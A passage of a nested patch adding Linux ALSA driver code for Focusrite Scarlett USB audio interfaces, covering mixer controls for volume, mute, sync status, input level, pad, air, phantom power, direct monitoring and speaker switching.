++		*kctl_return = kctl;
++
++	return 0;
++}
++
++/*** Sync Control ***/
++
++/* Update sync control after receiving notification that the status
++ * has changed
++ */
++static int scarlett2_update_sync(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	private->sync_updated = 0;
++	return scarlett2_usb_get_sync_status(mixer, &private->sync);
++}
++
++static int scarlett2_sync_ctl_info(struct snd_kcontrol *kctl,
++				   struct snd_ctl_elem_info *uinfo)
++{
++	static const char *texts[2] = {
++		"Unlocked", "Locked"
++	};
++	return snd_ctl_enum_info(uinfo, 1, 2, texts);
++}
++
++static int scarlett2_sync_ctl_get(struct snd_kcontrol *kctl,
++				  struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->sync_updated) {
++		err = scarlett2_update_sync(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->sync;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_sync_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.access = SNDRV_CTL_ELEM_ACCESS_READ,
++	.name = "",
++	.info = scarlett2_sync_ctl_info,
++	.get  = scarlett2_sync_ctl_get
++};
++
++static int scarlett2_add_sync_ctl(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	/* devices without a mixer also don't support reporting sync status */
++	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
++		return 0;
++
++	return scarlett2_add_new_ctl(mixer, &scarlett2_sync_ctl,
++				     0, 1, "Sync Status", &private->sync_ctl);
++}
++
++/*** Analogue Line Out Volume Controls ***/
++
++/* Update hardware volume controls after receiving notification that
++ * they have changed
++ */
++static int scarlett2_update_volumes(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	struct scarlett2_usb_volume_status volume_status;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++	int err, i;
++	int mute;
++
++	private->vol_updated = 0;
++
++	err = scarlett2_usb_get_volume_status(mixer, &volume_status);
++	if (err < 0)
++		return err;
++
++	private->master_vol = clamp(
++		volume_status.master_vol + SCARLETT2_VOLUME_BIAS,
++		0, SCARLETT2_VOLUME_BIAS);
++
++	if (info->line_out_hw_vol)
++		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
++			private->dim_mute[i] = !!volume_status.dim_mute[i];
++
++	mute = private->dim_mute[SCARLETT2_BUTTON_MUTE];
++
++	for (i = 0; i < num_line_out; i++)
++		if (private->vol_sw_hw_switch[i]) {
++			private->vol[i] = private->master_vol;
++			private->mute_switch[i] = mute;
++		}
++
++	return 0;
++}
++
++static int scarlett2_volume_ctl_info(struct snd_kcontrol *kctl,
++				     struct snd_ctl_elem_info *uinfo)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++
++	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
++	uinfo->count = elem->channels;
++	uinfo->value.integer.min = 0;
++	uinfo->value.integer.max = SCARLETT2_VOLUME_BIAS;
++	uinfo->value.integer.step = 1;
++	return 0;
++}
++
++static int scarlett2_master_volume_ctl_get(struct snd_kcontrol *kctl,
++					   struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] = private->master_vol;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int line_out_remap(struct scarlett2_data *private, int index)
++{
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int line_out_count =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++
++	if (!info->line_out_remap_enable)
++		return index;
++
++	if (index >= line_out_count)
++		return index;
++
++	return info->line_out_remap[index];
++}
++
++static int scarlett2_volume_ctl_get(struct snd_kcontrol *kctl,
++				    struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] = private->vol[index];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_volume_ctl_put(struct snd_kcontrol *kctl,
++				    struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->vol[index];
++	val = ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->vol[index] = val;
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_LINE_OUT_VOLUME,
++				       index, val - SCARLETT2_VOLUME_BIAS);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const DECLARE_TLV_DB_MINMAX(
++	db_scale_scarlett2_gain, -SCARLETT2_VOLUME_BIAS * 100, 0
++);
++
++static const struct snd_kcontrol_new scarlett2_master_volume_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.access = SNDRV_CTL_ELEM_ACCESS_READ |
++		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
++	.name = "",
++	.info = scarlett2_volume_ctl_info,
++	.get  = scarlett2_master_volume_ctl_get,
++	.private_value = 0, /* max value */
++	.tlv = { .p = db_scale_scarlett2_gain }
++};
++
++static const struct snd_kcontrol_new scarlett2_line_out_volume_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.access = SNDRV_CTL_ELEM_ACCESS_READWRITE |
++		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
++	.name = "",
++	.info = scarlett2_volume_ctl_info,
++	.get  = scarlett2_volume_ctl_get,
++	.put  = scarlett2_volume_ctl_put,
++	.private_value = 0, /* max value */
++	.tlv = { .p = db_scale_scarlett2_gain }
++};
++
++/*** Mute Switch Controls ***/
++
++static int scarlett2_mute_ctl_get(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] = private->mute_switch[index];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_mute_ctl_put(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->mute_switch[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->mute_switch[index] = val;
++
++	/* Send mute change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_MUTE_SWITCH,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_mute_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_mute_ctl_get,
++	.put  = scarlett2_mute_ctl_put,
++};
++
++/*** HW/SW Volume Switch Controls ***/
++
++static void scarlett2_sw_hw_ctl_ro(struct scarlett2_data *private, int index)
++{
++	private->sw_hw_ctls[index]->vd[0].access &=
++		~SNDRV_CTL_ELEM_ACCESS_WRITE;
++}
++
++static void scarlett2_sw_hw_ctl_rw(struct scarlett2_data *private, int index)
++{
++	private->sw_hw_ctls[index]->vd[0].access |=
++		SNDRV_CTL_ELEM_ACCESS_WRITE;
++}
++
++static int scarlett2_sw_hw_enum_ctl_info(struct snd_kcontrol *kctl,
++					 struct snd_ctl_elem_info *uinfo)
++{
++	static const char *const values[2] = {
++		"SW", "HW"
++	};
++
++	return snd_ctl_enum_info(uinfo, 1, 2, values);
++}
++
++static int scarlett2_sw_hw_enum_ctl_get(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++
++	ucontrol->value.enumerated.item[0] = private->vol_sw_hw_switch[index];
++	return 0;
++}
++
++static void scarlett2_vol_ctl_set_writable(struct usb_mixer_interface *mixer,
++					   int index, int value)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	struct snd_card *card = mixer->chip->card;
++
++	/* Set/Clear write bits */
++	if (value) {
++		private->vol_ctls[index]->vd[0].access |=
++			SNDRV_CTL_ELEM_ACCESS_WRITE;
++		private->mute_ctls[index]->vd[0].access |=
++			SNDRV_CTL_ELEM_ACCESS_WRITE;
++	} else {
++		private->vol_ctls[index]->vd[0].access &=
++			~SNDRV_CTL_ELEM_ACCESS_WRITE;
++		private->mute_ctls[index]->vd[0].access &=
++			~SNDRV_CTL_ELEM_ACCESS_WRITE;
++	}
++
++	/* Notify of write bit and possible value change */
++	snd_ctl_notify(card,
++		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
++		       &private->vol_ctls[index]->id);
++	snd_ctl_notify(card,
++		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
++		       &private->mute_ctls[index]->id);
++}
++
++static int scarlett2_sw_hw_change(struct usb_mixer_interface *mixer,
++				  int ctl_index, int val)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, ctl_index);
++	int err;
++
++	private->vol_sw_hw_switch[index] = val;
++
++	/* Change access mode to RO (hardware controlled volume)
++	 * or RW (software controlled volume)
++	 */
++	scarlett2_vol_ctl_set_writable(mixer, ctl_index, !val);
++
++	/* Reset volume/mute to master volume/mute */
++	private->vol[index] = private->master_vol;
++	private->mute_switch[index] = private->dim_mute[SCARLETT2_BUTTON_MUTE];
++
++	/* Set SW volume to current HW volume */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_LINE_OUT_VOLUME,
++		index, private->master_vol - SCARLETT2_VOLUME_BIAS);
++	if (err < 0)
++		return err;
++
++	/* Set SW mute to current HW mute */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_MUTE_SWITCH,
++		index, private->dim_mute[SCARLETT2_BUTTON_MUTE]);
++	if (err < 0)
++		return err;
++
++	/* Send SW/HW switch change to the device */
++	return scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_SW_HW_SWITCH,
++					index, val);
++}
++
++static int scarlett2_sw_hw_enum_ctl_put(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int ctl_index = elem->control;
++	int index = line_out_remap(private, ctl_index);
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->vol_sw_hw_switch[index];
++	val = !!ucontrol->value.enumerated.item[0];
++
++	if (oval == val)
++		goto unlock;
++
++	err = scarlett2_sw_hw_change(mixer, ctl_index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_sw_hw_enum_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = scarlett2_sw_hw_enum_ctl_info,
++	.get  = scarlett2_sw_hw_enum_ctl_get,
++	.put  = scarlett2_sw_hw_enum_ctl_put,
++};
++
++/*** Line Level/Instrument Level Switch Controls ***/
++
++static int scarlett2_update_input_other(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	private->input_other_updated = 0;
++
++	if (info->level_input_count) {
++		int err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_LEVEL_SWITCH,
++			info->level_input_count + info->level_input_first,
++			private->level_switch);
++		if (err < 0)
++			return err;
++	}
++
++	if (info->pad_input_count) {
++		int err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_PAD_SWITCH,
++			info->pad_input_count, private->pad_switch);
++		if (err < 0)
++			return err;
++	}
++
++	if (info->air_input_count) {
++		int err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_AIR_SWITCH,
++			info->air_input_count, private->air_switch);
++		if (err < 0)
++			return err;
++	}
++
++	if (info->phantom_count) {
++		int err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_PHANTOM_SWITCH,
++			info->phantom_count, private->phantom_switch);
++		if (err < 0)
++			return err;
++
++		err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_PHANTOM_PERSISTENCE,
++			1, &private->phantom_persistence);
++		if (err < 0)
++			return err;
++	}
++
++	return 0;
++}
++
++static int scarlett2_level_enum_ctl_info(struct snd_kcontrol *kctl,
++					 struct snd_ctl_elem_info *uinfo)
++{
++	static const char *const values[2] = {
++		"Line", "Inst"
++	};
++
++	return snd_ctl_enum_info(uinfo, 1, 2, values);
++}
++
++static int scarlett2_level_enum_ctl_get(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	int index = elem->control + info->level_input_first;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->level_switch[index];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_level_enum_ctl_put(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	int index = elem->control + info->level_input_first;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->level_switch[index];
++	val = !!ucontrol->value.enumerated.item[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->level_switch[index] = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_LEVEL_SWITCH,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_level_enum_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = scarlett2_level_enum_ctl_info,
++	.get  = scarlett2_level_enum_ctl_get,
++	.put  = scarlett2_level_enum_ctl_put,
++};
++
++/*** Pad Switch Controls ***/
++
++static int scarlett2_pad_ctl_get(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] =
++		private->pad_switch[elem->control];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_pad_ctl_put(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int index = elem->control;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->pad_switch[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->pad_switch[index] = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_PAD_SWITCH,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_pad_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_pad_ctl_get,
++	.put  = scarlett2_pad_ctl_put,
++};
++
++/*** Air Switch Controls ***/
++
++static int scarlett2_air_ctl_get(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] = private->air_switch[elem->control];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_air_ctl_put(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int index = elem->control;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->air_switch[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->air_switch[index] = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_AIR_SWITCH,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_air_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_air_ctl_get,
++	.put  = scarlett2_air_ctl_put,
++};
++
++/*** Phantom Switch Controls ***/
++
++static int scarlett2_phantom_ctl_get(struct snd_kcontrol *kctl,
++				     struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] =
++		private->phantom_switch[elem->control];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_phantom_ctl_put(struct snd_kcontrol *kctl,
++				     struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int index = elem->control;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->phantom_switch[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->phantom_switch[index] = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_PHANTOM_SWITCH,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_phantom_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_phantom_ctl_get,
++	.put  = scarlett2_phantom_ctl_put,
++};
++
++/*** Phantom Persistence Control ***/
++
++static int scarlett2_phantom_persistence_ctl_get(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++
++	ucontrol->value.integer.value[0] = private->phantom_persistence;
++	return 0;
++}
++
++static int scarlett2_phantom_persistence_ctl_put(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int index = elem->control;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->phantom_persistence;
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->phantom_persistence = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_PHANTOM_PERSISTENCE, index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_phantom_persistence_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_phantom_persistence_ctl_get,
++	.put  = scarlett2_phantom_persistence_ctl_put,
++};
++
++/*** Direct Monitor Control ***/
++
++static int scarlett2_update_monitor_other(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	int err;
++
++	/* monitor_other_enable[0] enables speaker switching
++	 * monitor_other_enable[1] enables talkback
++	 */
++	u8 monitor_other_enable[2];
++
++	/* monitor_other_switch[0] activates the alternate speakers
++	 * monitor_other_switch[1] activates talkback
++	 */
++	u8 monitor_other_switch[2];
++
++	private->monitor_other_updated = 0;
++
++	if (info->direct_monitor)
++		return scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_DIRECT_MONITOR,
++			1, &private->direct_monitor_switch);
++
++	/* if it doesn't do speaker switching then it also doesn't do
++	 * talkback
++	 */
++	if (!info->has_speaker_switching)
++		return 0;
++
++	err = scarlett2_usb_get_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
++		2, monitor_other_enable);
++	if (err < 0)
++		return err;
++
++	err = scarlett2_usb_get_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
++		2, monitor_other_switch);
++	if (err < 0)
++		return err;
++
++	if (!monitor_other_enable[0])
++		private->speaker_switching_switch = 0;
++	else
++		private->speaker_switching_switch = monitor_other_switch[0] + 1;
++
++	if (info->has_talkback) {
++		const int (*port_count)[SCARLETT2_PORT_DIRNS] =
++			info->port_count;
++		int num_mixes =
++			port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
++		u16 bitmap;
++		int i;
++
++		if (!monitor_other_enable[1])
++			private->talkback_switch = 0;
++		else
++			private->talkback_switch = monitor_other_switch[1] + 1;
++
++		err = scarlett2_usb_get_config(mixer,
++					       SCARLETT2_CONFIG_TALKBACK_MAP,
++					       1, &bitmap);
++		if (err < 0)
++			return err;
++		for (i = 0; i < num_mixes; i++, bitmap >>= 1)
++			private->talkback_map[i] = bitmap & 1;
++	}
++
++	return 0;
++}
++
++static int scarlett2_direct_monitor_ctl_get(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->direct_monitor_switch;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_direct_monitor_ctl_put(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int index = elem->control;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->direct_monitor_switch;
++	val = min(ucontrol->value.enumerated.item[0], 2U);
++
++	if (oval == val)
++		goto unlock;
++
++	private->direct_monitor_switch = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_DIRECT_MONITOR, index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_direct_monitor_stereo_enum_ctl_info(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
++{
++	static const char *const values[3] = {
++		"Off", "Mono", "Stereo"
++	};
++
++	return snd_ctl_enum_info(uinfo, 1, 3, values);
++}
++
++/* Direct Monitor for Solo is mono-only and only needs a boolean control
++ * Direct Monitor for 2i2 is selectable between Off/Mono/Stereo
++ */
++static const struct snd_kcontrol_new scarlett2_direct_monitor_ctl[2] = {
++	{
++		.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++		.name = "",
++		.info = snd_ctl_boolean_mono_info,
++		.get  = scarlett2_direct_monitor_ctl_get,
++		.put  = scarlett2_direct_monitor_ctl_put,
++	},
++	{
++		.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++		.name = "",
++		.info = scarlett2_direct_monitor_stereo_enum_ctl_info,
++		.get  = scarlett2_direct_monitor_ctl_get,
++		.put  = scarlett2_direct_monitor_ctl_put,
++	}
++};
++
++static int scarlett2_add_direct_monitor_ctl(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const char *s;
++
++	if (!info->direct_monitor)
++		return 0;
++
++	s = info->direct_monitor == 1
++	      ? "Direct Monitor Playback Switch"
++	      : "Direct Monitor Playback Enum";
++
++	return scarlett2_add_new_ctl(
++		mixer, &scarlett2_direct_monitor_ctl[info->direct_monitor - 1],
++		0, 1, s, &private->direct_monitor_ctl);
++}
++
++/*** Speaker Switching Control ***/
++
++static int scarlett2_speaker_switch_enum_ctl_info(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
++{
++	static const char *const values[3] = {
++		"Off", "Main", "Alt"
++	};
++
++	return snd_ctl_enum_info(uinfo, 1, 3, values);
++}
++
++static int scarlett2_speaker_switch_enum_ctl_get(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->speaker_switching_switch;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++/* when speaker switching gets enabled, switch the main/alt speakers
++ * to HW volume and disable those controls
++ */
++static int scarlett2_speaker_switch_enable(struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	int i, err;
++
++	for (i = 0; i < 4; i++) {
++		int index = line_out_remap(private, i);
++
++		/* switch the main/alt speakers to HW volume */
++		if (!private->vol_sw_hw_switch[index]) {
++			err = scarlett2_sw_hw_change(private->mixer, i, 1);
++			if (err < 0)
++				return err;
++		}
++
++		/* disable the line out SW/HW switch */
++		scarlett2_sw_hw_ctl_ro(private, i);
